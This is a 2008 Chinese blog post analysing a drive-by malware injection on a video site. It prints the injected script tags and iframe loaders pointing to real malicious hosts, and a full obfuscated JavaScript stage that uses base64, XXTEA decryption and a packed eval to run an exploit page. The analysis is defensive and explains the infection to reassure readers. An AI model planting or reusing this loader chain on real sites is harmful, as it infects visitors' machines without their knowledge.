Woodu’s Blog
msgbartop
在美国,让孩子相信圣诞老人的存在是每一个成年基督徒的义务。在中国,让孩子相信考上大学就能够出人头地是每一个被愚弄的家长的义务。
msgbarbottom

24 Jul 08 关于“口袋吧视频站”挂马事件分析

关于“口袋吧视频站”挂马事件分析

在完全载入视频站页面后会在网页底部发现如下代码:
复制内容到剪贴板
代码:

<script src=http://union1860%2Ecn></script>

反编码后得到
http://union1860.cn(挂马页面好孩子别去哦~我禁用URL识别了)
载入网页

查看源码得到(Ad Muncher过滤后代码,可能与原来网页有出入)

复制内容到剪贴板
代码:

document.writeln("<base onmouseover="window.status='完毕                                                     ';return true">");
var seraph;
if (seraph==null)
{
seraph=1;
document.write("<iframe src=http://www.kwiewer.cn/x7.htm width=100 height=0></iframe>");
}

其中挂有网页一只
http://www.kwiewer.cn/x7.htm(挂马页面好孩子别去哦~我禁用URL识别了)
继续载入

复制内容到剪贴板
代码:

<iframe src=timwp.html width=100 height=0></iframe>

好家伙,这就是那几位会员报告的有“病毒”的网页了吧
其实也不算是病毒,就是用了MS08-0xx(忘了= =||)做的个网页挂马罢了
下面源码比较长= =没耐心看完的就算了

复制内容到剪贴板
代码:

<SCRIPT>window.onerror=function(){return true;}</SCRIPT>
<SCRIPT>
<!– START AIYA Site Stat. –>
window.defaultStatus="完成";
Status="utf8to16";
function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4)
{case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String["fromCharCode"](((c&0×1F)<<6)|(char2&0×3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String["fromCharCode"](((c&0×0F)<<12)|((char2&0×3F)<<6)|((char3&0×3F)<<0));break;}}
return out.join('');}
var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function base64decode(str)
{var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = "";while(i<len)
{do
{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)
break;do
{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)
break;out+=String.fromCharCode((c1<<2)|((c2&0×30)>>4));do
{c3=str.charCodeAt(i++)&0xff;if(c3==61)
return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)
break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0×3C)>>2));do
{c4=str.charCodeAt(i++)&0xff;if(c4==61)
return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)
break;out+=String.fromCharCode(((c3&0×03)<<6)|c4)}
return out}
function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++)
{v=String.fromCharCode(v&0xff,v>>>8&0xff,v>>>16&0xff,v>>>24&0xff);}
if(w){return v.join('').substring(0,sl);}
else{return v.join('');}}
function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4)
{v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24;}
if(w){v[v.length]=len;}
return v;}
function xxtea_decrypt(str,key){if(str==""){return"";}
var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0×9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p–){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff;}
z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff;}
return long2str(v,true);}
t="5iwGwgAilVXeDy1a3dhqftwG+CHgaHx3IYMtEskEeb2v1fDSF1f8oFNof2BFNatxFVf3AL6aKiRssOXx+O2twsiiIkbJz4lqDPZZWVBxYZMppeL8/MfR2lg/LD744YBY5PUFrXObGUOs6fb6t93sw9E/zV+9vYrdDWs6/LpY1FZQB5GzQKrq4fQOQE9ewMUHvQVQrV8tEykVlwVExAjYCkevCVxQCheLayfRKr8AmIUOQVoH78QwRBtwizPErRvcvfce8U9pKtLZ1jfN2a6lLbFbr7UB/PnAOcV6j3OweBddY+kg2B9OXk7i1l0eJTW0un0UoufoMfXcKed0lOhF729LeTRZPWq9LXTULSBP6h6GqELjQNUyvXSVLq4zTGHm4U1eUhaBCFEosXkBcjWu9f+c4DpGiPZNOmgsQ4e0QNkTxupmR0CpT5GuGzbQdIzMP2q3K4ApK9uC4SwIkKl6IxTx3dzcCSKU/wvs6jv7VOEDd6XnulWFnjSThfHbR7QrPOPzl1jLGXDGJdFQakNWEdPssU5brTdeLyB8UE5qrh6iu1SY8GHt5yzssTu9kRflw7XolWXy+ww0zoAz0wE+ZnzDcrndkP6vFtBAMOycFWPOueggUje2gcLMtCKYGWtiarqrHjXqRmM3iL89VHuta0m1glujBpiBnTq37G4UKfkIVWSNsdimZfwMHFoBK47zvUE+aqA6XPUEDsN+EYIVunEvPlY0lD6LwHU7Czt0iYh0awUPaalcKRbE74fNtxdZkwjJ7kgoW5K7OOX9PEMNO8vymucyr7dfJfHh0lGLrtzHlV0r6rJyXqrwyZhjnhqtzIFL4My/J6Yn1AXRiYWn/2pL4Kt60NL/MRbN4iQoldI7oXYozegxYt283cskq8hbhJCQLE9nFHxdAtxRnVbOSusJVi6DFk2uCHnolVydoaR0mVac704XAF8SJibH21vAyRAhxBptBNzT7tWMxnLPhYDxHnqqv4ZzbHQGnifzNzpZ+wMLhZ0FVwLJ+EINVjBUMICjG56MMDahKwHZBJjI92sd2vEB5g6jxpa2Vdwg94jOuHOM3V8PiDtXjJcUfIoCAZ9PySHlpFR5tUWchkMKhY2ve54xACS0wfCJhJiEl/OQbeCYj2ejcjZ5DVwI2T8gQhMzwpJnqDMaD+pF2I7Vm7mBVbIeEXlM/fDUUPZv49y9KfdMYsFl29cCvDwo8VZA6so4DU4zujmjw3ApAKQVEi5eoOJ6OKVFO1oYNbJOwT2EUVW1P/phQ1QAAO+7DfdmWMMLAVj14lRlXX0Sk5xIkozzMmIPyhDRbSu2BTMFry28lQ2ReUM56V2nMhKxLh4WRTkiIq9Cjib4ALCHJXLBWw4QTZTe+QqSB3V2a0JhTxNeAuDOQ3VyChBhzS6/NCUe/mslHmcIjCyqtoIQpETktCdY6VbQDSV7pO84TYc0Juq1o7BWo12OkXzqas+5JmbXn2YF6vdchyQKvPhy70OQZELhiTOMq5aUZCXHNTiD+rhdyVneKS9QHkyQ3vYRm986qAMbQinM+HosE+3S7svZ+RJdtcp9c/JU0/nUevBVGGHt8QpUOjvCbpNQvD7s2AkjE1uokl13QInaxPFFs6zffYJv/BmHL0T2jV6vpgvRefUHKogU4Ku5vGV8XYC/b3HxNHSc8wk8F+qype1i99JInRIKENccbOA4uUDhSXYkfM+m6k6ItgwtgojfxXIAIQWmXwMuFTtVDkjVyQ4Hia1iw9cwbUDRwLyVVhFUbyrwXTwxz+np97ie9AC7y+Qz+tLznZDFiD46MBqGsxJ7mpp/2Ft3svtCmdKmkO9T2xOuJEjmCmIyiN51vosDptLb0gmEEpy7pRVkGC7eS2Ry5fezG7SzgbgE37z/dMbHrAHiX0a3PEXLuNaaTGcpOIQ5J9MUnfv2umecFxq6M56Tfxw0Tg1zfqMTwBllIsdxDkafW7666k60iFdX8on7CnIuKQS0I5KzdagI+2RhCIzl6Rt9JYJo3MIw2TOhqardMvjJkhrAKqv7JIoaMTeva0Mz1qWiX5zFoXNDWE6T1CaFeYp0R2FPrAIOohq1wgKmXhahSCeDsa0OytuDHjWh6Jry1ZzaDUBAglINBqdK851VmiY/9ZD4pBtoPOaRfggHI8JiO/C2vn8S4Npv6lzVGA0C5ACuOVbfL3bvFosyVOvtwIgLKGFG4csq0XnqYHb7+CtBvYH4DqgjTKkGwJaQIV/bEJKeRw/eyVgbt+tEiASmHLrY11F6e9oZxOfSCV10Z3cC6IEJbWiFCj8JJVx0DMrOpyVYMvPL6OcudVQKjtk8T1WSDkKE8DHTYJ8K1lUZnMtBkiDEh7V+u+5wC8wYG3VEf8uyDaILj8nUe49614onOBCV5c+Z9zCS37oDIsB/z/FTJO0I6YBhlHBPDn1g3/+lKXz7I8rhicjfhugYlzTCB5dO6HGApQoXhKCnJIVvnxFPf5O4Fqx9YjcFGXzqRwT4zUcRqXEFlVNbq3lM/j71LLWiFHaRtU46asiveYt4T+FKo7mNfjibzBCILZzWn/JYkxNeTqVqknnPbzt06nvB9dY/hI/TQQs+6rBFbPC0ke2+c1vcEGxWBRgF8vWRn0NBMh0RsldEu3W1Sgxj/Lyss6x+3nJOGWU6d2sFnXseAR4sM/GJquukdMVKqTSBnvQaHB3Sf9XSXVmYvzGuHKqAm7Q+M7fCLBB4EKJyWwRDNN9mxJWWszv2IKVPEXwfGYSDp95JK4RElxtDleMHasFzffvo3O2WZparnr2phhC9Qz/XxghyDADe6747a+4dWKcDuPwPUHgpftzHcA9xKT2skhYehso3www+W+yWW3YfaezFLTGGHpBmOWYcKR1klV7o+6vCHQlxhcSL5JDbQhgXA0Qd/z1/dCUhYFLoMw3lZKP3N10PRK7M2CSc0njbYJ62VPC4i9B5yARvCZB+E0xVCqKw+w8PIlxxX7KGOAd6SxWY4yj7V7Gl5qkSfnoFNh0rWYX+fh8Z4B5uiODOjfhvPkTgpzC5iug6hSJHbBKr5SwhtZMdm5kHXUwkEosmXzyWsuG6q0qUmS5FoMghumrzquZP9Cregmp9w5JNKkf+iEvccT0aVdHH53TccOvyaQfEEAh/9SlWFBfePTl1ThMV+KTJ4OK2tD5fRfCGWxS3X/QHxUDDp/QfZQCwemq8nTVKa1f7vgirzrVxoF537Kr1dZE+5o0Sb4gAuNxO/tZgNeTo12PynYzuh2j3TRQY8P7HQy5aWpqO9s+FGpGMSMTpLgp0pv1PStUPrdl2niqQHJfn+7R6m59o8fIx4w2swNS0KvEy+iybJxVsjt71IlHGfpSTEfPgOUYnYFCs9FqpmRe/mEGG6Qi9fBCAWuMLw/fplMRsvvoo2JoFXfsg8E973NBakQKhpf2xPDoq/7yfsfaz7XEzouN+EX+U7qiof57EWSWlbonoElgpwsGOfwMrKY3D6M8DuGWZ/CVAcNhs7W5jE5BxuW+3F4OtYOUs5rxOFgJAWBFDqMg0zHWsjaqy+PaUrdnw5G9oKygCTm3UbsYXLla/yI+MzhZflANoVe4QKm2PjZZl5E2fmSRzBEpjjH5zB3XocXz9okmCQqhl1kWobbhX7GYWS/dhtTAA1dKXHfzzasYNygMRKAAIRHwnPxmVtgwiRwKlodOOtiOJ4c8ULpCouNbFXp9+WzoxLUbKyC653w6ISeipU4ReVs8U8ZmnhNpXgiQ0zfMOgzZMM5fz/HPPWcKW8IVV25j1BNxzYAsjZXEQRZowzeD+efA4VcKVt+hWNEATGAsi3EtLcoI/EYlLcSaRaiUtuoIz2Vjo0tZnb2T3Ee9Um2seHGsv1wcm01rG1WM+ArDGpalu86pM/f/xzOsjOjRqox/R9sHGjjly9vCZpbLLdMAGo4K4vPSsG037O8VdO6fKaEJtNdzIjlwYGd3HcSxTCVRFuP3HDA30es3I/Ch3NWSJmfcAsZ4jeEG54WiF5zH2jdeOuoHv/5IvRS5oL/JMLtOBlVQQLF08NKL9bVi8b2ZXpSUeLqXu+JwWAruwP9WXaUcfmI4FvCO+/5Ahj3GM/nMECPg=";
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'w+'};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(''+e(c)+'','g'),k[c])}}return p}('0=4(5(3(0),'216d7'));c["a89"](0);',14,14,'t|x75|x66|base64decode|utf8to16|xxtea_decrypt|x63|x31|x61|x6c|x76|x65|window|x6b'.split('|'),0,{}))
</SCRIPT>

大概就是将挂马网页用BASE64加密了下,然后临时解出来运行罢了
没什么太大原理
这两天我也在玩sql注入+网页挂马XD

不过口袋吧真的不是我干的= =|

刚刚粗略用明小子跑了下视频站,没什么问题。估计应该是跨站挂上的。。
看来服务器安全也是个问题啊。。
仅仅拿出来粗略分析下免得各位对口袋吧产生误解。。以上

PokeTB
Woodu分析

Tags: ,

Filed in 外面有谁?
« 都去当好人吧,等着我被以反人类罪处死吧
文明用语?止增笑耳。 »

Reader's Comments

  1. user | 25 Jul 2008 11:23 上午

    lz分析的很到位啊
    支持下
    虽然没什么高深技术

  2. Woodu | 26 Jul 2008 3:17 下午

    - =没技术也叫到位
    这位大哥有意思

Leave a Comment

sidebartop
sidebarbottom
sidebartop

页面

sidebarbottom
sidebartop

 

一月 2009
« Dec    
 1234
567891011
12131415161718
19202122232425
262728293031  
sidebarbottom
sidebartop

饭否

饭否

Valid CSS!

Valid CSS!

sidebarbottom
sidebartop

友情链接

sidebarbottom
sidebartop

最近文章

sidebarbottom
sidebartop

背景音乐/搜索


Google
sidebarbottom
sidebartop

功能

sidebarbottom
sidebartop

赞助商链接

sidebarbottom
© Woodu’s Blog / Design: Smashing Wordpress Themes